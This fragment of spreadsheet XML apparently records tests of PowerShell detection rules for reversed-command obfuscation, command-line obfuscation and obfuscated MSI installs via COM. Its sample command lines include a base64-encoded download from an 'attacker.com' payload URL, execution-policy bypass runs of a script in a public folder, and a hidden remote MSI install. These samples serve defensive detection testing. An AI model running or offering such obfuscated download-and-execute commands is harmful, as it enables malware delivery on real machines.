          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1383" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1383" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1383" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1383" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1383" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1383" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1384" ht="15.75" customHeight="1" s="42">
      <c r="A1384" s="43" t="n"/>
      <c r="B1384" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1384" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1384" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1384" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENcoDeDCoMmANd SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1384" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1384" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1384" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1384" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1384" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1384" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1385" ht="15.75" customHeight="1" s="42">
      <c r="A1385" s="43" t="n"/>
      <c r="B1385" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1385" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1385" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1385" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ENCoDEdcoMMaNd SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1385" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1385" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1385" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1385" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1385" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1385" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1386" ht="15.75" customHeight="1" s="42">
      <c r="A1386" s="43" t="n"/>
      <c r="B1386" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1386" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1386" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1386" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eNcODeDcOMmANd SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1386" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1386" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1386" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1386" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1386" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1386" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1387" ht="15.75" customHeight="1" s="42">
      <c r="A1387" s="43" t="n"/>
      <c r="B1387" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1387" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1387" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1387" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -encODEDCOMMand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F1387" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1387" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1387" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1387" s="36" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1387" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1387" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1388" ht="15.75" customHeight="1" s="42">
      <c r="A1388" s="43" t="n"/>
      <c r="B1388" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1388" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1388" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1388" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1388" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1388" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1388" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1388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88" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1388" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1389" ht="15.75" customHeight="1" s="42">
      <c r="A1389" s="43" t="n"/>
      <c r="B1389" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1389" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1389" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1389" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -exeCUtioNpoLicy Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1389" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1389" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1389" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1389" s="36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89" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1389" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1390" ht="15.75" customHeight="1" s="42">
      <c r="A1390" s="43" t="n"/>
      <c r="B1390" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1390" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1390" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1390" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXecutIOnPOLIcY Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1390" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1390" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1390" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1390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0" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1390" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1391" ht="15.75" customHeight="1" s="42">
      <c r="A1391" s="43" t="n"/>
      <c r="B1391" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1391" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1391" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1391" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -FILE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1391" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1391" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1391" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1391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1" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1391" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1392" ht="15.75" customHeight="1" s="42">
      <c r="A1392" s="43" t="n"/>
      <c r="B1392" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1392" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1392" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1392" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -eXECutionPOliCY Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1392" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1392" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1392" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1392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2" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1392" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1393" ht="15.75" customHeight="1" s="42">
      <c r="A1393" s="43" t="n"/>
      <c r="B1393" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1393" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1393" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1393" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1393" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1393" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1393" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1393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3" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1393" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1394" ht="15.75" customHeight="1" s="42">
      <c r="A1394" s="43" t="n"/>
      <c r="B1394" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C1394" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D1394" s="36" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E1394" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -FIle C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1394" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1394" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1394" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1394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4" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1394" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1395" ht="15.75" customHeight="1" s="42">
      <c r="A1395" s="43" t="n"/>
      <c r="B1395" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1395" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1395" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1395" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1395" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1395" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1395" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1395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5" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1395" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1396" ht="15.75" customHeight="1" s="42">
      <c r="A1396" s="43" t="n"/>
      <c r="B1396" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1396" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1396" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1396" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -FIle C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1396" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1396" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1396" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1396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6" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1396" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1397" ht="15.75" customHeight="1" s="42">
      <c r="A1397" s="43" t="n"/>
      <c r="B1397" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1397" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1397" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1397" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -fIle C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1397" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1397" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1397" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1397" s="36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7" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1397" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1398" ht="15.75" customHeight="1" s="42">
      <c r="A1398" s="43" t="n"/>
      <c r="B1398" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1398" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1398" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1398" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -filE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1398" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1398" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1398" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1398" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder (fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4); 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8" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1398" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1399" ht="15.75" customHeight="1" s="42">
      <c r="A1399" s="43" t="n"/>
      <c r="B1399" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1399" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1399" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1399" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -EXecutIONPOLicy Bypass -filE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F1399" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1399" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1399" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1399" s="43" t="inlineStr">
        <is>
          <t>Execution of Powershell Script in Public Folder (fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4);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1399" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1399" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1400" ht="15.75" customHeight="1" s="42">
      <c r="A1400" s="43" t="n"/>
      <c r="B1400" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1400" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1400" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1400" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F1400" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1400" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1400" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1400" s="43" t="n"/>
      <c r="J1400" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1400" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1401" ht="15.75" customHeight="1" s="42">
      <c r="A1401" s="43" t="n"/>
      <c r="B1401" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1401" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1401" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1401" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F1401" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1401" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1401" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1401" s="36" t="n"/>
      <c r="J1401" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1401" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1402" ht="15.75" customHeight="1" s="42">
      <c r="A1402" s="43" t="n"/>
      <c r="B1402" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C1402" s="36" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D1402" s="36" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E1402" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F1402" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1402" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1402" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1402" s="36" t="n"/>
      <c r="J1402" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1402" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1403" ht="15.75" customHeight="1" s="42">
      <c r="A1403" s="43" t="n"/>
      <c r="B1403" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1403" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1403" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1403" s="36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403" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1403" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1403" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1403" s="36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403" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1403" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1404" ht="15.75" customHeight="1" s="42">
      <c r="A1404" s="43" t="n"/>
      <c r="B1404" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1404" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1404" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1404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404" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1404" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1404" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1404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404" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1404" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1405" ht="15.75" customHeight="1" s="42">
      <c r="A1405" s="43" t="n"/>
      <c r="B1405" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1405" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1405" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1405" s="36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405" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1405" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1405" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1405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405" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1405" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1406" ht="15.75" customHeight="1" s="42">
      <c r="A1406" s="43" t="n"/>
      <c r="B1406" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1406" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1406" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1406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406" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1406" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1406" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1406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406" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1406" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1407" ht="15.75" customHeight="1" s="42">
      <c r="A1407" s="43" t="n"/>
      <c r="B1407" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1407" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1407" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1407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407" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1407" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1407" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I140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407" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1407" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1408" ht="15.75" customHeight="1" s="42">
      <c r="A1408" s="43" t="n"/>
      <c r="B1408" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1408" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1408" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1408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408" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1408" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1408" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1408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408" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1408" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1409" ht="15.75" customHeight="1" s="42">
      <c r="A1409" s="43" t="n"/>
      <c r="B1409" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1409" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1409" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1409" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -WindowStyle Hidden -Command "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F1409" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1409" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1409" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1409" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J1409" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1409" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1410" ht="15.75" customHeight="1" s="42">
      <c r="A1410" s="43" t="n"/>
      <c r="B1410" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C1410" s="36" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D1410" s="36" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E1410" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -WIndoWStYle Hidden -c "$u='https://example.com/test.msi'; $i=New-Object -ComObject ('W' + 'indowsInstaller.Installer'); $i.UILevel=2; $i.InstallProduct($u, '')"</t>
        </is>
      </c>
      <c r="F1410" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1410" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1410" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1410" s="43" t="inlineStr">
        <is>
          <t>PowerShell MSI Install via WindowsInstaller COM From Remote Location (222720a7-047f-4054-baa5-bab9be757db0)</t>
        </is>
      </c>
      <c r="J1410" s="36" t="n">
        <v>0</v>
